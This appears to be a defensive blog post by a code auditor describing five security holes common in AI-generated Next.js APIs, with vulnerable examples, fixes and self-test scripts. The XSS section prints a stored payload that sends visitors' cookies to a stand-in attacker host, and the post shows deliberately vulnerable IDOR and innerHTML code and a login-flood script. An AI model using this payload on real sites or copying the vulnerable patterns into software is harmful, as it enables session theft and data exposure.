AI Generated Your API. Here Are the 5 Security Holes It Left Behind.

I audit JavaScript codebases for a living. Over the past two months, every single codebase that was primarily AI-generated had the same five security vulnerabilities. Not similar. The same. Identical patterns across different teams, different products, different AI tools.

AI tools produce the same blind spots because they are trained on the same tutorials where security was an afterthought. Here are the five holes and the exact code to fix each one.

Hole 1. Missing Ownership Check on Every Data Endpoint

This is the one that keeps me up at night. AI generates API routes that fetch data by ID without checking who is asking.

What AI generates:

export async function GET(req: Request, { params }: { params: { id: string } }) {
  const invoice = await db.invoice.findUnique({
    where: { id: params.id }
  })

  if (!invoice) return Response.json({ error: "Not found" }, { status: 404 })
  return Response.json(invoice)
}

Any authenticated user can change /api/invoices/abc123 to /api/invoices/xyz789 and read someone else's invoice. This is IDOR (Insecure Direct Object Reference), and it was in 4 of the 6 apps I reviewed last month.

The fix is one line:

// `session` comes from whatever auth check runs at the top of the handler
// (for example NextAuth's auth() or your own token verification)
const invoice = await db.invoice.findUnique({
  where: {
    id: params.id,
    userId: session.userId  // this line prevents IDOR
  }
})

Attacker gets 404 instead of your customer's data. Test every endpoint in your app right now: log in as User A, copy the token, log in as User B, use B's token to request A's resources. If it works, you have a breach waiting to happen.
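
If you want to script that check, here is a minimal sketch, assuming a bearer-token API and something like npx tsx to run it. The env var names and the invoice route are placeholders for your own app, not code from the audited projects.

// idor-check.ts — hypothetical smoke test: request User A's resource with User B's token
const BASE_URL = process.env.BASE_URL ?? "http://localhost:3000"
const TOKEN_B = process.env.TOKEN_B ?? ""            // a valid token for User B
const INVOICE_ID_A = process.env.INVOICE_ID_A ?? ""  // an invoice id that belongs to User A

const res = await fetch(`${BASE_URL}/api/invoices/${INVOICE_ID_A}`, {
  headers: { Authorization: `Bearer ${TOKEN_B}` },
})

if (res.ok) {
  console.error(`IDOR: User B read User A's invoice (status ${res.status})`)
  process.exit(1)
} else {
  console.log(`OK: got ${res.status} instead of another user's data`)
}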

Hole 2. Zero Rate Limiting on Auth Endpoints

None of the six apps I reviewed had rate limiting on login. Not one. An attacker can brute force passwords at 10,000 attempts per minute indefinitely.

Fix with Upstash in under 20 lines:

import { Ratelimit } from "@upstash/ratelimit"
import { Redis } from "@upstash/redis"

const limiter = new Ratelimit({
  // Redis.fromEnv() reads UPSTASH_REDIS_REST_URL and UPSTASH_REDIS_REST_TOKEN
  redis: Redis.fromEnv(),
  limiter: Ratelimit.slidingWindow(5, "15 m"),  // 5 attempts per 15 minutes
})

export async function POST(req: Request) {
  // x-forwarded-for can hold a comma separated list; take the first (client) IP
  const ip = req.headers.get("x-forwarded-for")?.split(",")[0].trim() ?? "unknown"
  const { success } = await limiter.limit(ip)

  if (!success) {
    return Response.json(
      { error: "Too many attempts. Try again later." },
      { status: 429 }
    )
  }

  // process login
}

Five attempts per 15 minutes per IP. Adjust the numbers for your use case but never ship a login endpoint with zero limits.

Hole 3. Secrets in NEXT_PUBLIC_ Variables

Two out of six apps had database connection strings and Stripe secret keys behind the NEXT_PUBLIC_ prefix. Anything with that prefix gets bundled into the client JavaScript, so anyone can open DevTools, search the JS files, and walk away with your database credentials.

Audit command you should run right now:

grep -r "NEXT_PUBLIC_" .env* --include="*.env*"

Every result that contains a database URL, a secret API key, a JWT signing secret, or a payment processor secret key needs the NEXT_PUBLIC_ prefix removed immediately. Move the API call to a Server Component or Server Action where the variable stays server side.

Things that are safe as NEXT_PUBLIC_: Stripe publishable keys, analytics IDs, public API endpoints. Everything else stays server only.
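
To make the server-only pattern concrete, here is a minimal sketch of a Server Action that uses the Stripe secret key. The file path, env var name, and amounts are assumptions, not code from the audited apps.

// app/actions/create-payment-intent.ts
"use server"

import Stripe from "stripe"

// No NEXT_PUBLIC_ prefix, so this value never reaches the client bundle.
const stripe = new Stripe(process.env.STRIPE_SECRET_KEY ?? "")

export async function createPaymentIntent(amountInCents: number) {
  // Runs only on the server; the browser sees just the returned client secret.
  const intent = await stripe.paymentIntents.create({
    amount: amountInCents,
    currency: "usd",
  })
  return { clientSecret: intent.client_secret }
}

The only Stripe value that belongs in a NEXT_PUBLIC_ variable is the publishable key the browser hands to Stripe.js.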

Hole 4. dangerouslySetInnerHTML Without Sanitization

AI generates this pattern constantly for any kind of rich text rendering:

<div dangerouslySetInnerHTML={{ __html: post.content }} />

If post.content ever contains user input at any point in the data chain, this is a stored XSS vulnerability. A saved payload like <img src=x onerror="fetch('https://evil.example/?c=' + document.cookie)"> runs in every visitor's browser and quietly ships their cookies to the attacker.

Fix with DOMPurify:

import DOMPurify from "isomorphic-dompurify"

<div dangerouslySetInnerHTML={{
  __html: DOMPurify.sanitize(post.content, {
    ALLOWED_TAGS: ["p", "strong", "em", "a", "br", "ul", "li", "h2", "h3"],
    ALLOWED_ATTR: ["href", "target", "rel"]
  })
}} />

Whitelist only the tags you actually need. Everything else gets stripped. And add a Content Security Policy header that blocks inline scripts as a second layer of defense.
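
The CSP header can live in the same middleware shown in the next section. The policy below is only an assumed starting point: a strict script-src usually needs a nonce-based setup to coexist with Next.js's own inline scripts, so adapt it rather than drop it in as-is.

// Add next to the other headers in middleware (see Hole 5). Blocks inline scripts and eval.
response.headers.set(
  "Content-Security-Policy",
  "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none'"
)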

Hole 5. No Security Headers at All

Every app I reviewed had zero custom security headers. Five minutes in middleware fixes this.

import { NextRequest, NextResponse } from "next/server"

export function middleware(request: NextRequest) {
  const response = NextResponse.next()

  response.headers.set(
    "Strict-Transport-Security",
    "max-age=31536000; includeSubDomains"
  )
  response.headers.set("X-Content-Type-Options", "nosniff")
  response.headers.set("X-Frame-Options", "DENY")
  response.headers.set(
    "Referrer-Policy",
    "strict-origin-when-cross-origin"
  )
  response.headers.set(
    "Permissions-Policy",
    "camera=(), microphone=(), geolocation=()"
  )

  return response
}

Scan your production URL at securityheaders.com. Anything below B grade means you are missing basic protections that take minutes to add.
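
If you want a quick check from your own machine before (or after) the scan, a small script like this, with the URL as a placeholder for your deployment, prints which of the headers above are actually being returned:

// check-headers.ts — run with something like: npx tsx check-headers.ts
const res = await fetch("https://your-app.example.com", { method: "HEAD" })

for (const name of [
  "strict-transport-security",
  "x-content-type-options",
  "x-frame-options",
  "referrer-policy",
  "permissions-policy",
]) {
  console.log(`${name}: ${res.headers.get(name) ?? "MISSING"}`)
}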

The 30 Minute Audit

Run all five checks on your codebase this afternoon:

1. Test every API endpoint with a different user's credentials. Any success response is an IDOR.

2. Attempt 100 failed logins in rapid succession (a quick script for this is sketched after this list). If nothing blocks you, rate limiting is missing.

3. Run grep -r "NEXT_PUBLIC_" .env* and review every result.

4. Search the codebase for dangerouslySetInnerHTML and trace each one back to its data source.

5. Scan your production URL at securityheaders.com.
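
Here is a rough sketch of check 2, assuming a JSON login route at /api/login. The URL and request body shape are placeholders for your own app.

// login-flood.ts — fire 100 bad logins; anything but a wall of 429s after the first few means no rate limiting
let blocked = 0

for (let i = 0; i < 100; i++) {
  const res = await fetch("http://localhost:3000/api/login", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ email: "victim@example.com", password: `wrong-${i}` }),
  })
  if (res.status === 429) blocked++
}

console.log(`100 attempts, ${blocked} rejected with 429`)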

Five checks. Thirty minutes. These catch the vulnerabilities that exist in the overwhelming majority of AI-generated JavaScript applications shipping to production right now.

AI was trained to be helpful, not paranoid. Your job is to be both.

More practical security and architecture patterns at jsgurujobs.com.
